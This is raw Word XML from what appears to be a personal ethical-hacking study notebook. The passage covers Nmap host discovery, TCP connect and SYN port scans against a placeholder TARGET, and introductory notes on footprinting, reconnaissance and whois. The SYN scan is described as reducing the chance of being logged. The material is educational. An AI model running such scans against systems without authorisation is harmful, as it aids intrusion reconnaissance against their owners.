      <w:bookmarkStart w:id="42" w:name="_Toc115553355"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lesson 5.1 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13E2E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Scanning and Enumeration + Sniffing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="3F4059F7" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C83365" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75687B49" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Live Host Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444E984E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00D45A07" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1635BAAF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap is the most popular network scanning tool. It was created by Gordon Lyon. I will showcase my journey on learning this great service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264796F4" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap tries to approach networks using several methods like ARP scan, ICMP scan, TCP/UDP ping scan, and many more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2376DE24" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2234DA34" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075DA206" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap sends ping scan to find live host, then proceeds to scan them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1D7F32" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to scan only the live hosts, you can issue </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA571CA" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320B16F2" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TARGET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7BFD1B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to only send </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A9E1AE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0143A735" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B724B50" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABFF23E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">PR </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TARGET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BCD9A8" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC27ECF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F87D045" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now that we scanned the live systems, we proceed to the next step which is scanning ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484DD7AF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As the ip address specifies a device on a network among others, TCP/UDP does the same but to the network service instead. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D582EB6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For now, we can classify ports in 2 states:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B04E9A9" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OPEN port indicates that there is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2795">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> service listening on that port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684E7D0" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CLOSED port indicates that there is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2795">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> service listening on that port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BDF44D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">FILTERED port happens when </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cannot determine whether the port is open or closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951EA5D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6698DB0F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="007B1F0B" w:rsidRDefault="004E2155" w:rsidP="004E2155">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T</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1F0B">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TARGET</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1F0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118B029" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This command for TCP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2AC2F9" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">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3286BF7F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1F0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">does the same as the previous one. However, it does not complete the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3 way</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> handshake connection. After receiving SYN/ACK, it does not send ACK to establish a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> but it sends RST/ACK and this decreases the chances of being logged</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1F0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D3A7C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w: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57698E99" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We can use this to check whether the port is OPEN or CLOSED. When the port is OPENED, no response should be returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07905EA0" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="007B1F0B" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When the port is CLOSED, we get an </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC7B4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ICMP packet of type 3, destination unreachable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488AC7D6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="007B1F0B" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2140ED" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00AE2795" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C471F5" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00AE2795" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50547DC6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5469F07E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3BEA43" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3896FA09" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1303021D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7574DA04" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00E13E2E" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDCB03C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc115553356"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lesson 5.2 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0071361A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0071361A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Reconnaissance and Social Engineering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="1361AD1D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="005E4780" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253AF7AC" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="005E4780" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To get closer to anything you need to gather information about the target first. From hacking perspective, there are several ways to get familiar with your target.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C358F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4780">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF9201" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DEF608" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071361A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B91407C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the larger process for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It can be defined as a survey to gather information about the target. It is the first step in </w:t>
      </w:r>
      <w:hyperlink r:id="rId106" w:anchor="page-top" w:history="1">
        <w:r w:rsidRPr="005D6581">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.unifiedkillchain.com/#page-top</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gain something against the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E63BC00" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reconnaissance is divided into two types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133015A8" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Passive reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB96B6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Active reconnaissance</w:t>
      </w:r>
      <w:r w:rsidRPr="00C075DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5591A54C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In passive reconnaissance you rely on the public available resources without having to engage with the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F4500" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="001946D3" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35926D42" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
